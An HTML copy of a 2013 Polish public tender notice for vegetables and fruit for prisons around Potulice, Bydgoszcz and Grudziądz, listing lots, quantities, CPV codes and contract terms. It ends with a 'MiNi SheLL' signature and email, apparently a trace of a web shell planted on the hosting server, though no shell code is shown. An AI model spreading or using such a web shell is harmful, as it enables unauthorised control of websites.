<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony ustalają, że treść umowy może ulec zmianie zgodnie z art. 144 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.).
2. Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1) nazwy, adresu oraz osób reprezentujących strony, a także osób wymienionych w § 6 pkt 1 i/lub pkt 2;
2) cen artykułów wymienionych w załączniku nr 1 do umowy, o kwotę nie większą niż wynikającą ze wskaźnika cen towarów i usług konsumpcyjnych, podanego przez GUS publikowanego na stronie internetowej: www.stat.gov.pl. Wskaźnik cen towarów i usług konsumpcyjnych liczony jest miesięcznie od terminu obowiązywania umowy, o którym mowa w § 2 pkt 1;
3) urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy;
4) każdej zmiany, która jest korzystna lub neutralna dla zamawiającego;
5) zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego;
6) terminu zakończenia (przedłużenia) obowiązywania niniejszej umowy, o którym mowa w § 2 pkt 1, z zastrzeżeniem § 3 pkt 3;
7) dopisania do § 5 pkt 1 ppkt 1 magazynu zlokalizowanego  na terenie Aresztu Śledczego w Chełmnie, ul. 22 stycznia 3a, (dotyczy grupy 3).
3. Zmiany postanowień niniejszej umowy wymagają potwierdzenia pisemnego w postaci aneksu, z zastrzeżeniem pkt 5.
4. Strona wnioskująca o zmianę postanowień niniejszej umowy niezwłocznie i pisemnie powiadamia o tym fakcie drugą stronę, uzasadniając zmianę okolicznościami faktycznymi i prawnymi oraz przedkłada propozycję aneksu do umowy.
5. Strony dopuszczają możliwość okresowych dostaw artykułów po cenie niższej niż określonej w załączniku nr 1 do umowy (tzw. promocja). Zmiany te nie wymagają potwierdzenia pisemnego w postaci aneksu do umowy.
6. Zmiana postanowień niniejszej umowy na podstawie pkt 2 ppkt 2) nie może następować częściej niż raz na kwartał.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bigb-baltica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> BIGB BALTICA O/POTULICE UL.ALEJA PARKOWA 1 ,89-120 POTULICE.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2013 godzina 12:00, miejsce: BIGB BALTICA O/POTULICE UL.ALEJA PARKOWA 1 ,89-120 POTULICE, SEKRETARIAT ZK POTULICE.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa 1(ZK Potulice).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Przedmiot zamówienia i jego opis
j.m.
1
2
3
1
Ziemniaki jadalne - o średniej wielkości, tzn. o przeciętnej średnicy ok. 6 cm, przeciętnej długości ok. 8 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jednostka miary kilogram. CPV: 03212100-6.
kg
2
Marchew - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram. CPV: 03221112-4
kg
3
Kapusta czerwona - w główkach, o minimalnej wadze główki 2,5 kg, jednostka miary kilogram. CPV: 03221410-3. 
kg
4
Groch łuskany, połówki, jednostka miary kilogram.
CPV: 03221220-4. 
kg
5
Fasola typu Jaś, duża, jednostka miary kilogram.
CPV: 03221210-1. 
kg
6
Cebula - średniej wielkości, jednostka miary kilogram.
CPV: 03221112-1. 
kg
7
Burak ćwikłowy - średniej wielkości, jednostka miary kilogram.
CPV: 03221111-7. 
kg
8
Pietruszka korzeń - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram. CPV: 03221100-7. 
kg
9
Nać pietruszki - o przeciętnej wadze pęczka ok. 100 g i maksymalnej długości 15 cm jednostka miary kilogram. CPV: 03221300-9.
kg
10
Koper - o przeciętnej wadze pęczka ok. 100g i maksymalnej długości 15 cm, jednostka miary kilogram. CPV: 03221300-9.
kg
11
Ogórek zielony - twardy, średniej wielkości, w całości, polny, jednostka miary kilogram. CPV: 03221270-9. 
kg
12
Papryka surowa - czerwona, cała, jednostka miary kilogram.
CPV: 03221230-7. 
kg
13
Pieczarka - o średniej wielkości, tzn. zamknięte kapelusze o średnicy od 3cm do 5cm, jednostka miary kilogram. CPV: 03221260-6. 
kg
14
Pomidor - czerwony, cały, średniej wielkości, polny, jednostka miary kilogram. CPV: 03221240-0. 
kg
15
Por - oczyszczony, gruby, w całości, jednostka miary kilogram.
CPV: 03222230-4. 
kg
16
Seler - duży, oczyszczony, bez liści, jednostka miary kilogram.
CPV: 03221100-7. 
kg
17
Kapusta włoska - w główkach, o wadze główki od 1,8 kg do 4,0 kg, jednostka miary kilogram. CPV: 03221410-3. 
kg
18
Kapusta biała - w główkach, o wadze główki od 2 kg do 4 kg, jednostka miary kilogram. CPV: 03221410-3. 
kg
19
Kapusta pekińska - w główkach, o minimalnej średnicy 10 cm i minimalnej długości 20 cm, jednostka miary kilogram. CPV: 03221410-3. 
kg
20
Cukinia - jednostka miary kg.
CPV: 03221310-2.
kg
21
Sałata głowiasta kl. I, - jednostka miary szt.
CPV: 03221310-2.
szt.
22
Sałata lodowa główka  -  jednostka miary szt.
CPV: 03221310-2. 
szt.
23
Sałata karbowana czerwona główka,  jednostka miary szt.
CPV: 03221310-2. 
szt.
24
Kalafior, jednostka miary szt.
CPV: 03221420-6.
szt.
25
Brokuły, jednostka miary szt.
CPV: 03221430-9. 
szt.
26
Pomidor koktajlowy tacka 500 g, jednostka miary szt.
CPV: 03221240-0. 
szt.
27
Rzodkiewka - jednostka miary szt.
CPV: 03221100-7. 
szt.
28
Mięta świeża doniczka, jednostka miary szt.
CPV: 03121100-6. 
szt.
29
Bazylia świeża doniczka,  jednostka miary szt.
CPV: 03121100-6.
szt.
30
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, jednostka miary kilogram. CPV: 03221100-7.
kg
31
Kapusta kwaszona z marchewką - bez konserwantów, jednostka miary kilogram. CPV: 03221410-3. 
kg
32
Fasolka szparagowa (sezonowo),  jednostka miary kg.
CPV: 03221212-0. 
kg
33
Wiśnie (sezonowo),  jednostka miary kg. CPV: 03222333-6. 
kg
34
Śliwki (sezonowo), jednostka miary kg. CPV: 03222334-3. 
kg
35
Brzoskwinia (sezonowo), jednostka miary kg. CPV: 03222332-9. 
kg
36
Truskawki (sezonowo), pakowane w łubianki do 3 kg, jednostka miary kg. CPV: 03222313-0.
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-6, 03.22.11.12-4, 03.22.12.20-4, 03.22.13.00-9, 03.22.12.30-7, 03.22.12.40-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2(AŚ Bydgoszcz,ZK Koronowo,ZK Bydgoszcz-Fordon,AŚ Chojnice).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Przedmiot zamówienia i jego opis
j.m.
Ilość szacunkowa
1
2
3
4
1
Ziemniaki jadalne - o średniej wielkości, tzn. o przeciętnej średnicy ok. 6 cm, przeciętnej długości ok. 8 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jednostka miary kilogram. CPV: 03212100-6.
kg
1200
2
Marchew - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram. CPV: 03221112-4
kg
400
3
Kapusta czerwona - w główkach, o minimalnej wadze główki 2,5 kg, jednostka miary kilogram. CPV: 03221410-3. 
kg
200
4
Groch łuskany, połówki, jednostka miary kilogram.
CPV: 03221220-4. 
kg
200
5
Fasola typu Jaś, duża, jednostka miary kilogram.
CPV: 03221210-1. 
kg
200
6
Cebula - średniej wielkości, jednostka miary kilogram.
CPV: 03221112-1. 
kg
1500 
7
Burak ćwikłowy - średniej wielkości, jednostka miary kilogram.
CPV: 03221111-7. 
kg
400 
8
Pietruszka korzeń - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram. CPV: 03221100-7. 
kg
60
9
Nać pietruszki - o przeciętnej wadze pęczka ok. 100 g i maksymalnej długości 15 cm jednostka miary kilogram. CPV: 03221300-9.
kg
50 
10
Koper - o przeciętnej wadze pęczka ok. 100g i maksymalnej długości 15 cm, jednostka miary kilogram. CPV: 03221300-9.
kg
50 
11
Ogórek zielony - twardy, średniej wielkości, w całości, polny, jednostka miary kilogram. CPV: 03221270-9. 
kg
500 
12
Papryka surowa - czerwona, cała, jednostka miary kilogram.
CPV: 03221230-7. 
kg
200 
13
Pieczarka - o średniej wielkości, tzn. zamknięte kapelusze o średnicy od 3cm do 5cm, jednostka miary kilogram. CPV: 03221260-6. 
kg
300 
14
Pomidor - czerwony, cały, średniej wielkości, polny, jednostka miary kilogram. CPV: 03221240-0. 
kg
600
15
Por - oczyszczony, gruby, w całości, jednostka miary kilogram.
CPV: 03222230-4. 
kg
50
16
Seler - duży, oczyszczony, bez liści, jednostka miary kilogram.
CPV: 03221100-7. 
kg
20
17
Kapusta włoska - w główkach, o wadze główki od 1,8 kg do 4,0 kg, jednostka miary kilogram. CPV: 03221410-3. 
kg
100
18
Kapusta biała - w główkach, o wadze główki od 2 kg do 4 kg, jednostka miary kilogram. CPV: 03221410-3. 
kg
200
19
Kapusta pekińska - w główkach, o minimalnej średnicy 10 cm i minimalnej długości 20 cm, jednostka miary kilogram. CPV: 03221410-3. 
kg
300
20
Cukinia - jednostka miary kg.
CPV: 03221310-2.
kg
200
21
Sałata głowiasta kl. I, - jednostka miary szt.
CPV: 03221310-2.
szt.
200
22
Sałata lodowa główka  -  jednostka miary szt.
CPV: 03221310-2. 
szt.
300
23
Sałata karbowana czerwona główka,  jednostka miary szt.
CPV: 03221310-2. 
szt.
150
24
Kalafior, jednostka miary szt.
CPV: 03221420-6.
szt.
500
25
Brokuły, jednostka miary szt.
CPV: 03221430-9. 
szt.
500
26
Pomidor koktajlowy tacka 500 g, jednostka miary szt.
CPV: 03221240-0. 
szt.
150
27
Rzodkiewka - jednostka miary szt.
CPV: 03221100-7. 
szt.
500 
28
Mięta świeża doniczka, jednostka miary szt.
CPV: 03121100-6. 
szt.
30 
29
Bazylia świeża doniczka,  jednostka miary szt.
CPV: 03121100-6.
szt.
30 
30
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, jednostka miary kilogram. CPV: 03221100-7.
kg
50 
31
Kapusta kwaszona z marchewką - bez konserwantów, jednostka miary kilogram. CPV: 03221410-3. 
kg
300 
32
Fasolka szparagowa (sezonowo),  jednostka miary kg.
CPV: 03221212-0. 
kg
200
33
Wiśnie (sezonowo),  jednostka miary kg. CPV: 03222333-6. 
kg
200
34
Śliwki (sezonowo),    jednostka miary kg. CPV: 03222334-3. 
kg
300
35
Brzoskwinia (sezonowo),  jednostka miary kg. CPV: 03222332-9. 
kg
300
36
Truskawki (sezonowo), pakowane w łubianki do 3 kg, jednostka miary kg. CPV: 03222313-0.
kg
500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-6, 03.22.11.12-4, 03.22.14.10-3, 03.22.12.20-4, 03.22.12.10-1, 03.22.13.00-9, 03.22.12.30-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa 3 (ZK nr 1 Grudziądz ,ZK nr 2 Grudziądz ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Przedmiot zamówienia i jego opis
j.m.
Ilość szacunkowa
1
2
3
4
1
Cebula - średniej wielkości, jednostka miary kilogram.
CPV: 03221112-1. 
kg
500 
2
Ogórek zielony - twardy, średniej wielkości, w całości, polny, jednostka miary kilogram. CPV: 03221270-9. 
kg
500 
3
Papryka surowa - czerwona, cała, jednostka miary kilogram.
CPV: 03221230-7. 
kg
200 
4
Pomidor - czerwony, cały, średniej wielkości, polny, jednostka miary kilogram. CPV: 03221240-0. 
kg
600
5
Seler - duży, oczyszczony, bez liści, jednostka miary kilogram.
CPV: 03221100-7. 
kg
20 
6
Sałata głowiasta kl. I, - jednostka miary szt.
CPV: 03221310-2.
szt.
50
7
Kalafior, jednostka miary szt.
CPV: 03221420-6.
szt.
50 
8
Brokuły, jednostka miary szt.
CPV: 03221430-9. 
szt.
50 
9
Pomidor koktajlowy tacka 500 g, jednostka miary szt.
CPV: 03221240-0. 
szt.
150
10
Rzodkiewka - jednostka miary szt.
CPV: 03221100-7. 
szt.
500 
11
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, jednostka miary kilogram. CPV: 03221100-7.
kg
50
12
Wiśnie (sezonowo), jednostka miary kg. CPV: 03222333-6. 
kg
200
13
Śliwki (sezonowo), jednostka miary kg. CPV: 03222334-3. 
kg
300
14
Brzoskwinia (sezonowo),  jednostka miary kg. CPV: 03222332-9. 
kg
300
15
Truskawki (sezonowo), pakowane w łubianki do 3 kg, jednostka miary kg. CPV: 03222313-0.
kg
500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.12-1, 03.22.12.70-9, 03.22.12.30-7, 03.22.12.40-0, 03.22.12.10-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa 4 (AŚ Inowrocław ,AŚ Toruń , ZK Włocławek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Przedmiot zamówienia i jego opis
j.m.
Ilość szacunkowa
1
2
3
4
1
Cebula - średniej wielkości, jednostka miary kilogram.
CPV: 03221112-1. 
kg
300 
2
Ogórek zielony - twardy, średniej wielkości, w całości, polny, jednostka miary kilogram. CPV: 03221270-9. 
kg
500 
3
Papryka surowa - czerwona, cała, jednostka miary kilogram.
CPV: 03221230-7. 
kg
200 
4
Pomidor - czerwony, cały, średniej wielkości, polny, jednostka miary kilogram. CPV: 03221240-0. 
kg
600
5
Seler - duży, oczyszczony, bez liści, jednostka miary kilogram.
CPV: 03221100-7. 
kg
20 
6
Sałata głowiasta kl. I, - jednostka miary szt.
CPV: 03221310-2.
szt.
50
7
Kalafior, jednostka miary szt.
CPV: 03221420-6.
szt.
50 
8
Brokuły, jednostka miary szt.
CPV: 03221430-9. 
szt.
50 
9
Pomidor koktajlowy tacka 500 g, jednostka miary szt.
CPV: 03221240-0. 
szt.
150
10
Rzodkiewka - jednostka miary szt.
CPV: 03221100-7. 
szt.
500 
11
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, jednostka miary kilogram.
CPV: 03221100-7.
kg
50
12
Wiśnie (sezonowo), jednostka miary kg.
CPV: 03222333-6. 
kg
200
13
Śliwki (sezonowo), jednostka miary kg.
CPV: 03222334-3. 
kg
300
14
Brzoskwinia (sezonowo),  jednostka miary kg.
CPV: 03222332-9. 
kg
300
15
Truskawki (sezonowo), pakowane w łubianki do 3 kg, jednostka miary kg. CPV: 03222313-0.
kg
500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.12-1, 03.22.12.70-9, 03.22.12.40-0, 03.22.11.00-7, 03.22.13.10-2, 03.22.14.20-6, 03.22.12.40-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Grupa 5 (ZK Potulice).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Przedmiot zamówienia i jego opis
j.m.
Ilość szacunkowa
1
2
3
4
1
Banan. CPV: 03222111-4. 
kg
800
2
Grejpfrut. CPV: 03222230-4. 
kg
400 
3
Winogrono zielone. CPV: 032222340-8. 
kg
400 
4
Winogrono fioletowe. CPV: 032222340-8. 
kg
400 
5
Gruszki. CPV: 03222322-6. 
kg
400
6
Kiwi. CPV: 03222118-3. 
kg
150 
7
Pomarańcze. CPV: 03222200-1.
kg
2000 
8
Mandarynki. CPV: 03222240-7. 
kg
3000 
9
Cytryny. CPV: 03222210-8. 
kg
500 
10
Jabłka - całe, średniej wielkości. CPV: 03222321-9. 
kg
2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.11-4, 03.22.22.30-4, 03.22.23.40-8, 03.22.23.22-6, 03.22.21.18-3, 03.22.22.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Grupa 6 (AŚ Bydgoszcz,ZK Koronowo, ZK Bydgoszcz-Fordon,AŚ Chojnice).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Przedmiot zamówienia i jego opis
j.m.
Ilość szacunkowa
1
2
3
4
1
Banan. CPV: 03222111-4. 
kg
800 
2
Grejpfrut. CPV: 03222230-4. 
kg
500 
3
Winogrono zielone. CPV: 032222340-8. 
kg
400 
4
Winogrono fioletowe. CPV: 032222340-8. 
kg
400 
5
Gruszki. CPV: 03222322-6. 
kg
400
6
Kiwi. CPV: 03222118-3. 
kg
250 
7
Pomarańcze. CPV: 03222200-1.
kg
2000 
8
Mandarynki. CPV: 03222240-7. 
kg
3000
9
Cytryny. CPV: 03222210-8. 
kg
500 
10
Jabłka - całe, średniej wielkości. CPV: 03222321-9. 
kg
2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.11-4, 03.22.22.30-4, 03.22.23.40-8, 03.22.23.22-6, 03.22.21.18-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Grupa 7 (ZK nr 1 Grudziądz, ZK nr 2 Grudziądz).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Przedmiot zamówienia i jego opis
j.m.
Ilość szacunkowa
1
2
3
4
1
Banan. CPV: 03222111-4. 
kg
800
2
Grejpfrut. CPV: 03222230-4. 
kg
500
3
Winogrono zielone. CPV: 032222340-8. 
kg
400
4
Winogrono fioletowe. CPV: 032222340-8. 
kg
400
5
Gruszki. CPV: 03222322-6. 
kg
400
6
Kiwi. CPV: 03222118-3. 
kg
250
7
Pomarańcze. CPV: 03222200-1.
kg
1000
8
Mandarynki. CPV: 03222240-7. 
kg
3000
9
Cytryny. CPV: 03222210-8. 
kg
500
10
Jabłka - całe, średniej wielkości. CPV: 03222321-9. 
kg
2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.11-4, 03.22.22.30-4, 03.22.23.40-8, 03.22.23.22-6, 03.22.21.18-3, 03.22.22.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Grupa 8 (AŚ Inowrocław ,AŚ Toruń ,ZK Włocławek).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Przedmiot zamówienia i jego opis
j.m.
Ilość szacunkowa
1
2
3
4
1
Banan. CPV: 03222111-4. 
kg
800
2
Grejpfrut. CPV: 03222230-4. 
kg
500
3
Winogrono zielone. CPV: 032222340-8. 
kg
400
4
Winogrono fioletowe. CPV: 032222340-8. 
kg
400
5
Gruszki. CPV: 03222322-6. 
kg
400
6
Kiwi. CPV: 03222118-3. 
kg
150
7
Pomarańcze. CPV: 03222200-1.
kg
1000
8
Mandarynki. CPV: 03222240-7. 
kg
3000
9
Cytryny. CPV: 03222210-8. 
kg
500
10
Jabłka - całe, średniej wielkości. CPV: 03222321-9. 
kg
2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.11-4, 03.22.22.30-4, 03.22.23.40-8, 03.22.23.22-6, 03.22.22.40-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com